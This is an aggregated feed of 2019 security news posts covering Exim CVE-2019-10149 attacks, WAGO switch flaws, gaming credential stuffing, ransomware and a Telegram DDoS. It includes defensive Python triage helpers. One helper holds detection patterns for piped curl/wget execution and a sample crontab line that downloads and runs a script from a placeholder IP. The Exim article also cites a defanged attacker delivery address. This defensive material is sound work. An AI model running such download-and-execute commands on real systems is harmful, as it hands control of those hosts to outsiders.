Weekly Update 143


Well this was a big one. The simple stuff first - I'm back in Norway running workshops and getting ready for my absolute favourite event of the year, NDC Oslo. I'm also talking about Scott's Hack Yourself First UK Tour where he'll be hitting up Manchester, London and Glasgow with public workshops. Tickets are still available at those and it'll be your last chance for a long time to do that event in the UK.

Then there's Project Svalbard. I think it'll come across in the video below, but putting a project I've poured my heart and soul into over the last five and a half years up for sale is a massive thing for me. There are so many emotions involved at so many levels and I really wanted to try and get that across in a more personable form than what the written word lends itself to. I hope I've done that, and I hope you enjoy listening to the back story of Project Svalbard. Here it is:



  1. Scott's public Hack Yourself First UK Tour is coming up (Manchester, London and Glasgow - get on it!)
  2. Project Svalbard (the big one - this is a long weekly update mostly about my decision to move HIBP into another organisation)
  3. Twilio is sponsoring my blog this week (learn what regulations like PSD2 mean for your business, and how Twilio can help you achieve secure, compliant transactions)

Millions of Exim mail servers are currently under attack

Hackers are targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions; the threat actors are exploiting the CVE-2019-10149 flaw.

Millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions are under attack: threat actors are exploiting the CVE-2019-10149 flaw to take them over.

A critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

The CVE-2019-10149 issue resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server.

The flaw is easily exploitable by both local and remote attackers in certain non-default configurations, and experts believed that threat actors would start using it in attacks in the wild.

The CVE-2019-10149 flaw was addressed by the Exim development team with the release of version 4.92 in February. Unfortunately, a large number of systems are still affected by the vulnerability.

Querying Shodan for vulnerable versions of Exim, it is possible to find 3,655,524 installs, most of them in the United States (1,984,5538).
Searching for patched Exim installs running the 4.92 release, we can find 1,795,332 systems.


“CVE-2019-10149, which was first discovered on June 5, is now being used as the vulnerability for a widespread campaign to attack Exim servers and propagate across the Internet,” reads a blog post published by Cybereason.

“We are aware of an initial wave of attacks as described by Freddie Leeman on June 9, 2019. The first hacker group began pushing exploits from a C2 server located on the clear web. A second round of attacks by a different attacker are being analyzed by the Nocturnus team.”

Attackers are scanning the internet for vulnerable mail servers; once a server is compromised, the initially deployed script downloads a second script designed to check whether OpenSSH is installed on the compromised machine.

If OpenSSH is not present, the script installs and starts it, so that the attackers can log in as root via SSH using an RSA key pair for authentication.

Experts also observed another campaign carried out by a second group of attackers that is also targeting Exim servers.

The second stream of attacks was spotted by Freddie Leeman on June 9, in this wave of attacks attackers were delivering the script used to exploit vulnerable Exim servers from 173[.]212[.]214[.]137/s.

“During the subsequent days, this group evolved its attacks, changing the type of malware and scripts it would download on infected hosts; a sign that they were still experimenting with their own attack chain and hadn’t settled on a particular exploit method and final goal,” reported ZDNet.

The attackers behind this second stream used multiple variants and continuously changed the scripts.
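To triage a host against the campaign described above, an administrator needs three things: whether the running Exim is in the affected 4.87 to 4.91 range, which cron jobs fetch and execute remote content, and which authorized_keys entries are not on the known-good list. The following helpers are an added example, not Cybereason's or the Exim project's code; the version banner, crontab and key entries are constructed samples, and the version check deliberately ignores distribution backports, which must be verified against the distro advisory.

```python
"""Host triage helpers for the Exim CVE-2019-10149 campaign (added example)."""
import base64
import hashlib
import re

# Exim 4.87 through 4.91 are affected; 4.92 shipped the fix.
FIRST_VULNERABLE, LAST_VULNERABLE = 87, 91


def exim_version_is_vulnerable(banner):
    """True for an upstream 4.87-4.91 version string (e.g. the output of `exim -bV`).

    Caveat: distributions backport fixes without bumping the upstream version,
    so a True result still has to be checked against the distro advisory.
    """
    m = re.search(r"\b4\.(\d+)\b", banner)
    if not m:
        raise ValueError("no Exim 4.x version in: %r" % banner)
    return FIRST_VULNERABLE <= int(m.group(1)) <= LAST_VULNERABLE


# Download-and-execute cron lines and payloads fetched from Tor hidden services
# or bare IP addresses are what the reported campaign used for persistence.
_CRON_PATTERNS = (
    re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b"),
    re.compile(r"\.onion\b"),
    re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}\b"),
)


def suspicious_cron_lines(crontab_text):
    """Return the non-comment crontab lines matching any campaign-style pattern."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if any(p.search(stripped) for p in _CRON_PATTERNS):
            hits.append(stripped)
    return hits


def ssh_key_fingerprint(authorized_keys_line):
    """SHA256 fingerprint of one authorized_keys entry, in OpenSSH's 'SHA256:...' form."""
    fields = authorized_keys_line.split()
    # Options may precede the key type; the base64 blob follows the type field.
    for i, field in enumerate(fields):
        if field.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(fields):
            blob = base64.b64decode(fields[i + 1])
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError("not an authorized_keys entry: %r" % authorized_keys_line)


def unknown_authorized_keys(authorized_keys_text, known_fingerprints):
    """Entries whose fingerprint is not in the administrator's allow-list."""
    unknown = []
    for line in authorized_keys_text.splitlines():
        if line.strip() and not line.lstrip().startswith("#"):
            if ssh_key_fingerprint(line) not in known_fingerprints:
                unknown.append(line.strip())
    return unknown


def _fake_key_blob(seed):
    """Constructed key blob: correct ssh-rsa framing, dummy key material (not a real key)."""
    body = b"\x00\x00\x00\x07ssh-rsa" + hashlib.sha256(seed).digest() * 3
    return base64.b64encode(body).decode()


# Constructed artefacts: one legitimate admin key plus one appended by an intruder,
# and a crontab with a benign job and a download-and-execute job pulling from a
# TEST-NET placeholder address.
KNOWN_ADMIN_KEY = "ssh-rsa " + _fake_key_blob(b"admin-workstation") + " admin@workstation"
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    KNOWN_ADMIN_KEY,
    "ssh-rsa " + _fake_key_blob(b"unexpected") + " root@localhost",
])
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * wget -q -O - http://203.0.113.10/s | sh
"""

if __name__ == "__main__":
    # Constructed banner in the `exim -bV` format.
    print("vulnerable:", exim_version_is_vulnerable("Exim version 4.91 #1 built 20-Jun-2018"))
    print("cron hits:", suspicious_cron_lines(SAMPLE_CRONTAB))
    allow = {ssh_key_fingerprint(KNOWN_ADMIN_KEY)}
    print("unknown keys:", unknown_authorized_keys(SAMPLE_AUTHORIZED_KEYS, allow))
```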

Pierluigi Paganini

(SecurityAffairs – Exim, hacking)

The post Millions of Exim mail servers are currently under attack appeared first on Security Affairs.

New infosec products of the week: June 14, 2019

Skybox Security Suite 10 to simplify enterprise security management processes Skybox Security Suite 10 brings an intuitive, customizable user experience to simplify management of vulnerabilities, security policies, firewalls and changes from a central solution. Cloud and operational technology (OT) security insights are integrated seamlessly for uniform risk management across hybrid networks. SecBI extends its threat detection solution with automated response SecBI announced the extension of its agent-less, threat detection solution with automated response. Now security … More

The post New infosec products of the week: June 14, 2019 appeared first on Help Net Security.

Gaming Industry An Attractive Target For Cybercriminals

The gaming industry, in general, is aware that login attempts and other forms of credential abuse are a problem, but perhaps not as aware as it should be.

According to a new Akamai report, hackers are using new methods to evade detection, and many organizations do not grasp the scope and complexity of the identity theft problem.

The State of the Internet Report: The Company’s 2019 Web Gambling and Gambling Abuse Web Sites, published at the annual Akamai Edge World event, revealed that hackers had made more than 12 billion attacks on gaming sites between late 2017 and March of this year, making the gamer community one of the most aggressively targeted groups and one of the most lucrative for cybercriminals.

In total, gambling sites accounted for more attacks aimed at obtaining credentials than any other sector during the period Akamai investigated.

“One reason that we believe the gaming industry is an attractive target for hackers is that criminals can easily exchange in-game items for profit,” said Martin McKeay, security researcher for Akamai and editorial director of the report. “Furthermore, gamers are a niche demographic known for spending money, so their financial status is also a tempting target.”

The Akamai report also pointed out that SQL injection attacks (SQLi) accounted for about two-thirds of all Web application attacks, while Local File Inclusion (LFI) attacks accounted for about a quarter.

The report points out that most credential stuffing lists circulate online usage data from well-known large-scale data breaches, and that many of them are rooted in SQLi.

An Akamai press release says its researchers have discovered a video explaining to users how to perform SQLi attacks against websites and using the credentials obtained to generate lists that can be used for the credential stuffing against online games.

“As gaming companies continue to innovate and improve their defenses, they must also continue to educate their consumers on how to protect themselves and defend themselves. Many players are young and if they learn best practices to protect their accounts, they will incorporate them for the rest of their lives,” McKeay said.

The Akamai report shows that more than two-thirds of application layer attacks are directed against US-based organizations, and that Russia and Canada occupy positions No. 1 and No. 2 as sources of attacks on the gaming sector. “Attackers see credential abuse as a low-risk venture with a potential for a high payout, at least for now,” Akamai’s report reads.

The report notes that attackers assign more value to compromised accounts linked to valid credit cards and other financial instruments. Once these accounts are compromised, they are used to buy additional items, including in-game currency.

These types of attacks are likely to increase in the future. As with many other types of attack, the important thing is to keep in mind that they occur, so that you can find ways to defend your business against them.

The post Gaming Industry An Attractive Target For Cybercriminals appeared first on .

Organizations are advancing their efforts, investing in OT cybersecurity programs

ICS cybersecurity threats remain high and present evolving challenges, a new SANS report reveals. However, since the last SANS OT/ICS report released in 2017, a growing majority of organizations have significantly matured their security postures over the last two years and are adopting strategies that address OT/IT convergence. “The findings in this latest SANS report make it clear that 2019 is the year for ICS cybersecurity,” said Nozomi Networks CEO Edgard Capdevielle. “We see the … More

The post Organizations are advancing their efforts, investing in OT cybersecurity programs appeared first on Help Net Security.

Organizations need capabilities and practices to generate value from AI

Businesses actively embracing artificial intelligence and striving to bring technological advancements into their operations are reaping dividends not seen by companies who fail to properly adapt and adopt. While most business and technology leaders are optimistic about the value-creating potential of AI in their enterprise – Enterprise Cognitive Computing (ECC) – the actual rate of adoption is low, and benefits have proved elusive for a majority of organizations. A study involving Lancaster University Management School’s … More

The post Organizations need capabilities and practices to generate value from AI appeared first on Help Net Security.

The gaming community is a rising target for credential stuffing attacks

Hackers have targeted the gaming industry by carrying out 12 billion credential stuffing attacks against gaming websites within the 17-month period analyzed in the report (November 2017 – March 2019) by Akamai. This puts the gaming community among the fastest rising targets for credential stuffing attacks and one of the most lucrative targets for criminals looking to make a quick profit. During the same time period, Akamai saw a total … More

The post The gaming community is a rising target for credential stuffing attacks appeared first on Help Net Security.

5G subscriptions to reach 1.9 billion in 2024, critical IoT connections on the rise

Rapid early momentum and enthusiasm for 5G has led Ericsson to forecast an extra 400 million enhanced mobile broadband subscriptions globally by the end of 2024. The June 2019 edition of the Ericsson Mobility Report forecasts 1.9 billion 5G subscriptions – up from 1.5 billion forecasted in the November 2018 edition – an increase of almost 27 percent. Other forecasts have also increased notably as a result of the rapid 5G uptake. 5G coverage is … More

The post 5G subscriptions to reach 1.9 billion in 2024, critical IoT connections on the rise appeared first on Help Net Security.

Stop Discarding Devices Frequently- It’s Risky for Mother Earth as Well As Your Cybersecurity

“Aunty, do you happen to have any waste paper at home? I need them for my Environment Day project,” chirped a bright little thing standing at my door early Sunday morning.

“I am sure I have. What is your project this year?”

“Oh! I want to emphasize ‘Reduce. Reuse. Recycle.’ by making durable paper bags that people can pack their gifts in. It will also reduce the use of plastic.”

We need more such efforts on the part of all producers, consumers and recyclers to restore the balance on earth, which we have sadly turned into a dump yard of toxic waste that is polluting our land, water and air. The matter is serious and calls for judicious purchase and use of goods.

This Environment day, why not pledge to reduce e-waste, digital citizens?

What is e-waste?

Electronic waste or e-waste describes discarded electrical or electronic devices. Used electronics which are destined for refurbishment, reuse, resale, salvage, recycling through material recovery, or disposal are also considered e-waste.

This means that all the obsolete devices and electronic goods lying around at home or thrown away in bins are e-waste.

Why is there a rise in e-waste?

The volume of annual e-waste is on the rise, thanks to the desire for the latest models, fueled by rising disposable income, technological progress and cheap data rates. Gone are the thrifty days when we purchased goods to last; now we want only the smartest and latest.

Consider this: The Global E-Waste Monitor, 2017, published by the United Nations University, estimated that India generates about 2 million metric tons of e-waste annually, of which almost 82% consists of personal devices!

Why are we worried about e-waste?

We want the Earth to continue being the clean, green and beautiful planet that it is, right? But the increasing amount of e-waste is a threat to the environment. If not processed properly, it can have negative effects on pollution levels and consequently on the health of all life forms. Toxicity in soil will affect soil fertility, and hence crop production. We have already witnessed the effect of plastics and toxic fumes from incinerators on birds and animal life.

How is e-waste connected to cybersecurity?

Improper disposal of devices can also pose a security risk. If you have not taken the trouble to delete all the content and reset the device to factory settings, your data, including photos, may fall into the wrong hands and be misused. Before you give away or throw away old devices, take care to thoroughly wipe their content and unsync them from your other devices.

How to reduce e-waste?

This is your Environment Day Mantra: Reduce. Recycle. Refurbish. Reuse.

Every time you desire to replace an electronic item, ask yourself, ‘Is it really necessary to purchase it now or can it be postponed? Am I doing it to keep up with or ahead of the Joneses? What will I do with the old product?’ Such soul-searching often leads to sane decisions that you will not regret later.

With that in mind, and the following tips handy, you can become a positive contributor to keeping the environment clean.

  1. Keep your devices in top condition: The two most common devices to be found in homes across India are the computer (or laptop) and smartphone. Replace slow batteries and keep them secured. Carry out regular scans and clean-ups and install all software updates.
  2. Protect your phone from damage: Use a screen guard and phone cases to reduce the chances of breakage. Your kids can choose trendy cases that serve two purposes: protecting their phones and encouraging them to use the devices for a longer period.
  3. Battery life: Avoid overcharging the battery to extend its life.
  4. Secure your products: Use licensed security tools to remove malware and optimize performance.

Some countries offer financial incentives to return old devices at designated collection centres. Perhaps we should start something like this to encourage people to recycle?

Things You Can Do This Environment Day:

Still not found a suitable project for Environment Day? Why not go on a collection drive of gaming devices and mobile phones that your neighbours have lying at home. You can then clean them and get in touch with a reputed NGO to channel these gaming devices to children’s homes, domestic help and others. Think about it.



The post Stop Discarding Devices Frequently- It’s Risky for Mother Earth as Well As Your Cybersecurity appeared first on McAfee Blogs.

Significant trends are beginning to develop in the Government ID market

The worldwide installed base of both smart and legacy credentials will grow from 9.8 billion in 2018 to 11.5 billion in 2023, according to ABI Research. With increased rates of international travel and government focus shifting to border control and security of citizen’s data, significant regional and innovation trends are beginning to develop in the Government ID market. “When it comes to regions, identifiable trends are emerging as it pertains to the objectives that credential … More

The post Significant trends are beginning to develop in the Government ID market appeared first on Help Net Security.

Threat Stack and JASK speeding incident response times, improving productivity

Threat Stack, the leader in cloud security and compliance for infrastructure and applications, and JASK, the provider of the industry’s first cloud-native SIEM platform, announced a partnership designed to help security operations teams reduce the time and effort needed to detect and respond to cloud security incidents identified by the Threat Stack Cloud Security Platform. “Cloud sprawl is a major issue with businesses that creates blind spots for IT and security teams,” said Rob Fry, … More

The post Threat Stack and JASK speeding incident response times, improving productivity appeared first on Help Net Security.

Securitas and Purdue University Global offer employee security certificate programs

Securitas Security Services USA, the knowledge leader in the protective services industry, announced an exclusive partnership with Purdue University Global to offer four security certificate programs to enhance the knowledge and skills of its security officers, and significant financial benefits to assist officers in earning associate and bachelor degrees. Purdue Global, a public, accredited nonprofit online institution of higher education, developed the 20-credit certificate programs in partnership with Securitas for the following areas of expertise: … More

The post Securitas and Purdue University Global offer employee security certificate programs appeared first on Help Net Security.

NFC Forum expands connectivity for IoT device manufacturers

The NFC Forum announced the publication of the new Tag NFC Data Exchange Format Exchange Protocol Candidate Specification (TNEP) and a new candidate version of its popular Connection Handover Technical Specification (CH 1.5). The TNEP candidate specification is the first of its kind to simplify the bidirectional exchange of data between an NFC-enabled phone and an IoT device. When combined with the TNEP, CH 1.5 enables new Near Field Communication (NFC), Bluetooth and Wi-Fi negotiated … More

The post NFC Forum expands connectivity for IoT device manufacturers appeared first on Help Net Security.

Wipro and Moogsoft delivering AIOps solutions for customers

Wipro, a leading global information technology, consulting and business process services company and Moogsoft, a pioneer and leading provider of artificial intelligence for IT operations (AIOps), announced a partnership. Wipro will leverage Moogsoft’s industry-leading platform to deliver next-generation artificial intelligence for IT operations (AIOps) solutions for its customers. Moogsoft’s AIOps platform, powered by purpose-built Machine Learning (ML) algorithms, helps IT teams in the real-time detection and remediation of IT incidents across applications, networks and IT … More

The post Wipro and Moogsoft delivering AIOps solutions for customers appeared first on Help Net Security.

WAGO Industrial Switches affected by multiple flaws

A security expert at SEC Consult discovered that some WAGO industrial managed switches are affected by several serious vulnerabilities.

A security researcher at consulting company SEC Consult discovered several vulnerabilities in some models of WAGO industrial switches.

The vulnerabilities affect WAGO industrial switches 852-303, 852-1305 and 852-1505 models. The company has already fixed the issues with the release of firmware versions 1.2.2.S0, 1.1.6.S0 and 1.1.5.S0, respectively.

“The industrial managed switch series 852 from WAGO is affected by multiple vulnerabilities such as old software components embedded in the firmware. Furthermore, hardcoded password hashes and credentials were also found by doing an automated scan with IoT Inspector,” reads the security advisory. “Two vulnerabilities (CVE-2017-16544 and CVE-2015-0235) were verified by emulating the device with the MEDUSA scalable firmware runtime. The validity of the password hashes and the embedded keys were also verified by emulating the device.”

One of the most severe issues is the presence of hardcoded credentials that can be used to connect to the devices via Telnet and SSH.

“Hardcoded Credentials (CVE-2019-12550) – The device contains hardcoded users and passwords which can be used to login via SSH and Telnet,” continues the advisory.

The expert also found hardcoded private keys for the SSH daemon in the device’s firmware. An attacker can use them to carry out man-in-the-middle (MitM) attacks against the Dropbear SSH daemon without the victim noticing any fingerprint changes.

“The device contains hardcoded private keys for the SSH daemon. The fingerprint of the SSH host key from the corresponding SSH daemon matches the embedded private key,” states the advisory.

SEC Consult also discovered that the WAGO industrial switches use outdated versions of the BusyBox UNIX toolkit and the GNU C Library (glibc). Both are affected by known vulnerabilities, some of which are rated critical.

Experts suggest restricting network access to the device and SSH server in order to protect the system. The good news is that affected switches are not exposed online.
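As an added example (not SEC Consult's or WAGO's code), the following Python script shows the defender-side check this finding implies: because the host private key is baked into the firmware, every affected unit presents the same SSH host key fingerprint, so collecting a fleet's host keys (for example with ssh-keyscan) and grouping hosts by fingerprint exposes the shared key. The key blobs and hostnames below are constructed for the example and are not real WAGO keys.

```python
"""Find SSH host keys shared by more than one device.

Added example, not from the advisory: computes OpenSSH-style SHA256
fingerprints for the public keys a set of hosts present and reports any
fingerprint seen on multiple hosts. Input follows the ssh-keyscan output
format "<host> <keytype> <base64-blob>"; the sample data is constructed.
"""
import base64
import hashlib
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple


def fingerprint_sha256(pubkey_line: str) -> str:
    """OpenSSH "SHA256:" fingerprint: base64(sha256(key blob)), '=' padding stripped."""
    fields = pubkey_line.split()
    if len(fields) < 2:
        raise ValueError("expected '<keytype> <base64-blob> [comment]'")
    blob = base64.b64decode(fields[1])
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_keyscan(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Parse ssh-keyscan output into (host, keytype, blob); '#' lines are banners."""
    entries = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, keytype, rest = line.split(None, 2)
        entries.append((host, keytype, rest.split()[0]))
    return entries


def shared_host_keys(entries: Iterable[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """Map each fingerprint presented by more than one host to the sorted host list."""
    by_fp = defaultdict(set)
    for host, keytype, blob in entries:
        by_fp[fingerprint_sha256(f"{keytype} {blob}")].add(host)
    return {fp: sorted(hosts) for fp, hosts in by_fp.items() if len(hosts) > 1}


def fake_blob(seed: int) -> str:
    # Constructed ssh-ed25519 wire-format blob: length-prefixed type string, then 32 key bytes.
    raw = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes([seed]) * 32
    return base64.b64encode(raw).decode()


# Constructed sample: three switches ship the same baked-in key, one has a unique key.
SAMPLE_KEYSCAN = [
    "# switch-a:22 SSH-2.0-dropbear",
    f"switch-a ssh-ed25519 {fake_blob(1)}",
    f"switch-b ssh-ed25519 {fake_blob(1)}",
    f"switch-c ssh-ed25519 {fake_blob(1)}",
    f"switch-d ssh-ed25519 {fake_blob(2)}",
]

if __name__ == "__main__":
    for fp, hosts in shared_host_keys(parse_keyscan(SAMPLE_KEYSCAN)).items():
        print(f"{fp} is presented by {len(hosts)} hosts: {', '.join(hosts)}")
```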

The German VDE CERT has published an advisory to warn of the flaws in the WAGO devices.

Pierluigi Paganini

(SecurityAffairs – Wago industrial switches, hacking)

The post WAGO Industrial Switches affected by multiple flaws appeared first on Security Affairs.

Fifty States, Fifty laws

The big news lately is that individual states are proposing their own privacy laws. California has the California Consumer Protection Act and now New York and Maine have also proposed laws. There has been discussion of a federal law, however it seems unlikely that any kind of landmark legislation on privacy passes through to be […]

The post Fifty States, Fifty laws appeared first on Privacy Ref Blog.

Telegram Recovers from DDoS Attack

Telegram Messenger, which recently suffered a DDoS (Distributed Denial of Service) attack, has reportedly recovered, and everything now seems stabilized.

A ZDNet report, dated June 13, 2019, says, “Telegram Messenger has recovered from a distributed denial of service (DDoS) attack that hit its platform on Wednesday, telling its 200 million-plus users that for the moment, things seem to have stabilised.”

On June 12, Telegram had intimated users via Twitter about the DDoS attack. The Tweet said, “We’re currently experiencing a powerful DDoS attack, Telegram users in the Americas and some users from other countries may experience connection issues.”

Telegram even explained to users, in a rather funny and interesting manner, how DDoS attacks work: “A DDoS is a “Distributed Denial of Service attack”: your servers get GADZILLIONS of garbage requests which stop them from processing legitimate requests. Imagine that an army of lemmings just jumped the queue at McDonald’s in front of you – and each is ordering a whopper… The server is busy telling the whopper lemmings they came to the wrong place – but there are so many of them that the server can’t even see you to try and take your order.”

The users were also told how cybercriminals use botnets to turn a DDoS attack into something resembling a “zombie apocalypse”, and that such an attack is only about overloading the servers and does not affect data security.

Eventually, Telegram told users that everything was OK and that things seemed to have stabilized.

The fact that the timing of the DDoS attack on Telegram coincided with the Hong Kong extradition law protests organized on the platform has been pointed out. There are inferences that the attack was launched mostly from China. Telegram founder and CEO Pavel Durov has tweeted, “IP addresses coming mostly from China. Historically, all state actor-sized DDoS (200-400 Gb/s of junk) we experienced coincided in time with protests in Hong Kong (coordinated on @telegram). This case was not an exception.”

Massive and violent protests are going on in Hong Kong opposing the government’s plans to pass a bill that would allow extraditions to China. The protests were largely organized on Telegram, Facebook, Twitter and other messaging apps, like WhatsApp and Signal. The South China Morning Post had reported that protestors were using encrypted messenger apps to organize themselves, share intelligence and avoid police detection. The report also says that a Telegram group administrator was arrested on suspicion of conspiracy to commit public nuisance.

Telegram has played a key role in the organization of the protests as it allows the creation of groups for up to 200,000 people or to create channels for broadcasting to unlimited audiences. Moreover, it is seen as a secure way to communicate and avoid China’s strict surveillance regime as it allows encryption of messages. The South China Morning Post points out that though news about the current protests is being shared over Facebook and Twitter, much of the sensitive information sharing and coordination is done using Telegram and Signal. The report also says that the public is now more concerned about privacy especially after the Facebook data breach by Cambridge Analytica and the fast development of big data and surveillance technology in the mainland.

The South China Morning Post quotes Lokman Tsui, a professor at Chinese University researching media and technology, as saying, “People are smarter around technology now. They are using tech in a way that doesn’t give you away.” The report adds that, according to Professor Tsui, some apps, including Telegram, are not as safe as protesters assume. He points out that messages over Telegram are not encrypted by default and that most people don’t know they have to actually turn on the encryption feature.

The post Telegram Recovers from DDoS Attack appeared first on .

Employees Out of Work after ASCO Hit by Ransomware

Nearly 1,000 employees in ASCO’s Zaventem, Belgium, office have been left incapable of doing their jobs after a ransomware attack crippled the aircraft-parts manufacturer, according to a June 11 report from vrt NWS.

“From the ISF’s standpoint, everyone who has access to an organization’s information and systems should be made aware of the risks from ransomware and the actions required to minimize those risks,” said Steve Durbin, managing director of the Information Security Forum.

“The bottom line is that if you can’t do without the information and you don’t have a backup, then paying is the only option you have left to recapture your data. Therefore, prevention is the way to go to better protect yourself.”

ASCO temporarily shut down operations at its headquarters in Zaventem in the aftermath of the attack, as was reported by Data News.

Spirit AeroSystems acquired ASCO, a Belgian organization, in 2018. Spirit AeroSystems reportedly said that it would also temporarily cease production in other countries, according to a June 13 post from Tripwire.

“Initially, ASCO merely disclosed that someone had hacked its servers. It did not supply additional details at that time....As of this writing, it’s unclear what ransomware family was responsible for the infection or how it gained access to ASCO’s network,” Tripwire’s David Bisson wrote.

“This latest ransomware attack against a critical supplier of airplane parts is another reminder on how destructive ransomware continues to be to organizations,” said Joseph Carson, chief security scientist at Thycotic.

“Ransomware, however, should be a lower risk to businesses if they follow common industry best practices such as the introduction of a solid incident response plan, backup and recovery practice, cybersecurity awareness training and strong privilege and access management controls to limit administrator access.”

“Supply chains are difficult to secure. They create risk that is hard to identify, complicated to quantify and costly to address. A compromise anywhere in the supply chain can have just as much impact on your business, your bottom line, and your reputation, as one from within the organization.”

Gaming’s All Fun and Games Till Someone Gets Hacked

Cyber-criminals are playing games with the gaming industry according to two new reports published by Akamai and Kaspersky.  

The Akamai 2019 State of the Internet/Security Web Attacks and Gaming Abuse Report found that cyber-criminals have targeted the gaming industry by carrying out 12 billion credential-stuffing attacks against gaming websites, with a total of 55 billion credential-stuffing attacks across all industries within the 17-month period analyzed in the report (November 2017–March 2019).

SQL injection (SQLi) attacks account for 65% of all web application attacks, while local file inclusion (LFI) attacks only represent 24.7%, according to the report. As SQLi attacks have grown as an attack vector, the report found that the bridge between SQLi and credential-stuffing attacks is almost a direct line.

“One reason that we believe the gaming industry is an attractive target for hackers is because criminals can easily exchange in-game items for profit,” said Martin McKeay, security researcher at Akamai and editorial director of the State of the Internet/Security Report. “Furthermore, gamers are a niche demographic known for spending money, so their financial status is also a tempting target.”

In related news, research from Kaspersky confirmed that, unfortunately, more and more video games are being used to distribute malware to unsuspecting users. According to the research, more than 930,000 users were hit by malware attacks in the last 12 months, which cyber-criminals have achieved through crafting and distributing fake copies of popular video games, including "Minecraft," "Grand Theft Auto V" and "Sims 4."

Malware-disguised "Minecraft" accounted for around 30% of attacks, with over 310,000 users hit. Coming in at a distant second place was "Grand Theft Auto V," which targeted more than 112,000 users.

According to the researchers, criminals were also found trying to lure users into downloading malicious files pretending to be unreleased games. Spoofs of at least 10 pre-release games were seen, with 80% of detections focused on "FIFA 20," "Borderlands 3," and the "Elder Scrolls 6."

“For months now we see that criminals are exploiting entertainment to catch users by surprise – be it series of popular TV shows, premieres of top movies or popular video games,” said Maria Fedorova, security researcher at Kaspersky, in a press release.

“This is easy to explain: people can be less vigilant when they just want to relax and have fun. If they’re not expecting to find malware in something fun they’ve used for years, it won’t take an advanced-threat like infection vector to succeed. We urge everyone to stay alert, avoid untrusted digital platforms and suspicious-looking offers, install security software and perform a regular security scan of all devices used for gaming.”

Small and Mid-size Orgs: Take Notice of this Trend in the 2019 Verizon Data Breach Investigations Report (DBIR).

43% of breaches in 2018 involved small businesses. Hackers know you’re vulnerable and they’re acting on it.

We’re big fans of the DBIR over here, not just because we’re contributing partners and want to see our name in lights. Yes, we’re certainly guilty of initially jumping into the contributor section and searching for our logo, but after that, we devour the data. The report in itself is an easy read, and there is also a DBIR executive summary available for those that want a short overview.

At GRA Quantum, we’re experts at developing tailored security solutions for small organizations facing big threats, and the data in this year’s DBIR shows that the threats facing these orgs are only growing. 43% of breaches in 2018 involved small businesses. That makes sense when you take the threat actors’ POV into account: attackers know that small and mid-size businesses don’t have the cyber hygiene expected of enterprise organizations, yet the personally identifiable information (PII) and intellectual property of smaller organizations is just as valuable.

It’s not all bad news.

As more organizations, especially in the small and mid-size range, move to the cloud, hackers shift their focus to the cloud too. The DBIR showed an increase in attacks on cloud-based servers. Where’s the good news in this? Much of this hacking stems from stolen credentials and can be prevented with better education amongst staff, paired with anti-phishing technology and managed security services. All of these are affordable options for companies that don’t have hundreds or thousands of endpoints.

More good news: you can start protecting your small org today by implementing some cybersecurity best practices. We’ve developed a checklist to strengthen your cybersecurity program that can get you started. It’s more straightforward than you may anticipate, and you don’t have to be technical or in a security role to kick off the initiative. In fact, the list was created for management in Human Resources and Finance departments. Items in the list that are easiest to implement include:

  • Enforcing a policy to require multi-factor authentication (MFA) to access all company systems
  • Creating an onboarding and offboarding policy, integrating HR and IT activities
  • Developing a third-party vendor risk management program

Start taking this proactive approach to get ahead of the threats and strengthen your security stance today.


The post Small and Mid-size Orgs: Take Notice of this Trend in the 2019 Verizon Data Breach Investigations Report (DBIR). appeared first on GRA Quantum.

Leveraging McAfee Endpoint Security to Protect Against Emotet and Other Malware

Customers often ask us how to implement the suggestions provided in our blogs and threat advisories to better protect their environments. The goal of this blog is to do just that.

By showing you how to better use our products, you’ll be able to protect against Emotet and other malware. Emotet is a Trojan downloader spread by malicious spam campaigns using JavaScript, VBScript, and Microsoft Office macro functions. It downloads additional malware and persists on the machine as a service. Emotet has been observed to download ransomware, mass-mailing worms, W32/Pinkslipbot, W32/Expiro, W32/Dridex, and banking Trojans.

NOTE: Always test changes prior to implementing them in your environment.

1. DATs and product updates

One of the most common issues seen while in Support was an outdated DAT.

2. Make sure you have at least one scheduled product update task in McAfee ePO to run daily.

3. On-Access Scan (OAS) configuration for McAfee Endpoint Security and McAfee VirusScan Enterprise

Ensure that On-Access Scan (OAS) is enabled and set to scan on read and write and that entire drives aren’t excluded from being scanned. McAfee Endpoint Security and McAfee VirusScan Enterprise allow you to configure different scan settings based on the process. You can enable “Configure different settings for High-Risk and Low-Risk processes” to improve performance and reduce the need for file/folder exclusions. See KB88205 for more information.

Be sure that Artemis/GTI is enabled and that the first scanner action is “Clean” and the second action is “Delete”.

NOTE: Setting Artemis/GTI to High or Very High should be done gradually and with testing to reduce the risk of false positives. See KB53735 for more information.

4. On-Demand Scan (ODS)

A weekly On-Demand Scan (ODS) is suggested to ensure that your systems don’t have malware or PUPs. Do not run an ODS during peak business hours, as users may complain about system performance.

5. Access Protection (AP)

While the default Access Protection (AP) rules provide decent coverage, both McAfee Endpoint Security and McAfee VirusScan Enterprise allow for the creation of user-defined rules to prevent infection and the spread of worms or viruses. Below are some pre-created ones that should be tested and enabled in your environment to provide additional protection.

Pre-Defined Rule:

